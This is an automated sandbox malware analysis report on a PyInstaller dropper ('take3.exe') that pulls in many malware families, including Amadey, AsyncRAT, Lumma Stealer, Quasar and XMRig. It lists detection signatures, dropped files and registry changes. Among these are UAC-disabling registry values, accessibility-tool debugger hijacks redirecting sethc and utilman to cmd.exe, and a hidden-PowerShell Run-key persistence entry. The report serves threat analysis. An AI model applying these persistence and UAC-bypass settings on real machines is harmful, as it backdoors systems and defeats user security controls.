Malware Analysis Report

2025-01-23 11:52

Sample ID 241128-yns7batpbn
Target take3.exe.zip
SHA256 5f16ff577993765462d5b054e943ed28bf5dbddb869ca48b22e5643c1a32e6c9
Tags
pyinstaller amadey ammyyadmin asyncrat flawedammyy lumma metasploit njrat quasar xmrig xred xworm default e43a13 office04 sgvp backdoor credential_access defense_evasion discovery dropper evasion execution miner persistence privilege_escalation rat spyware stealer trojan upx vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5f16ff577993765462d5b054e943ed28bf5dbddb869ca48b22e5643c1a32e6c9

Threat Level: Known bad

The file take3.exe.zip was found to be: Known bad.

Malicious Activity Summary

pyinstaller amadey ammyyadmin asyncrat flawedammyy lumma metasploit njrat quasar xmrig xred xworm default e43a13 office04 sgvp backdoor credential_access defense_evasion discovery dropper evasion execution miner persistence privilege_escalation rat spyware stealer trojan upx vmprotect

Quasar payload

Metasploit family

xmrig

Amadey family

Quasar family

MetaSploit

Amadey

Asyncrat family

Ammyy Admin

UAC bypass

Detect Xworm Payload

FlawedAmmyy RAT

Xmrig family

AmmyyAdmin payload

Ammyyadmin family

Xworm

Xred family

Xworm family

njRAT/Bladabindi

Njrat family

Flawedammyy family

Xred

Lumma family

AsyncRat

Lumma Stealer, LummaC

Quasar RAT

XMRig Miner payload

Async RAT payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Enumerates VirtualBox registry keys

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Blocklisted process makes network request

Download via BitsAdmin

Sets file to hidden

Event Triggered Execution: Image File Execution Options Injection

Modifies Windows Firewall

Downloads MZ/PE file

Unsecured Credentials: Credentials In Files

Executes dropped EXE

Drops startup file

VMProtect packed file

Checks BIOS information in registry

Loads dropped DLL

Reads user/profile data of web browsers

Identifies Wine through registry keys

Event Triggered Execution: Component Object Model Hijacking

Checks computer location settings

Reads data files stored by FTP clients

Modifies file permissions

.NET Reactor proctector

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Adds Run key to start application

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

UPX packed file

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Program crash

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Access Token Manipulation: Create Process with Token

Unsigned PE

Event Triggered Execution: Netsh Helper DLL

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Accessibility Features

Command and Scripting Interpreter: JavaScript

Detects Pyinstaller

NSIS installer

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Kills process with taskkill

Views/modifies file attributes

GoLang User-Agent

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Gathers network information

Enumerates system info in registry

Runs net.exe

Uses Task Scheduler COM API

Delays execution with timeout.exe

Checks processor information in registry

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Runs ping.exe

Opens file in notepad (likely ransom note)

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-11-28 19:56

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-28 19:56

Reported

2024-11-28 19:58

Platform

win7-20240729-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2328 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2328 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2328 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe

Processes

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI23282\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-28 19:56

Reported

2024-11-28 19:58

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

Njrat family

njrat

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\system32\reg.exe N/A

Xmrig family

xmrig

Xred

backdoor xred

Xred family

xred

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\UrlHausFiles\def.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Downloads MZ/PE file

Event Triggered Execution: Image File Execution Options Injection

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger = "C:\\Windows\\system32\\cmd.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0" C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe C:\Windows\system32\reg.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\def.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\def.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\boot.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe C:\Users\Admin\Downloads\UrlHausFiles\22.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\translucently.vbs C:\Users\Admin\AppData\Local\palladiums\translucently.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe C:\Users\Admin\Downloads\UrlHausFiles\22.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\langla.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\http.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\av_downloader1.1.exe N/A
N/A N/A C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\t6kzDd6.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9f16311490\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
N/A N/A C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\winbox.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\boot.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wget.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\Set_up.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SharpHound.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\ENP.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\wget.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\test28.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\award.pdf.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AllNew.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\msf.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\FACTURA09876567000.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\palladiums\translucently.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\wwbizsrvs.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\def.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine C:\Users\Admin\Downloads\UrlHausFiles\def.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\tvtC9D3.exe N/A
N/A N/A C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateComRegisterShell64.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A
N/A N/A C:\Program Files (x86)\Google\Update\GoogleUpdate.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\Downloads\\UrlHausFiles\\nbea1t8.exe'\"" C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\nbea1t8.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\random.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\def.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2916 set thread context of 4928 N/A C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleCrashHandler64.exe C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_fr.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ja.dll C:\Users\Admin\Downloads\UrlHausFiles\ChromeSetup.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ar.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_th.dll C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdate.exe N/A
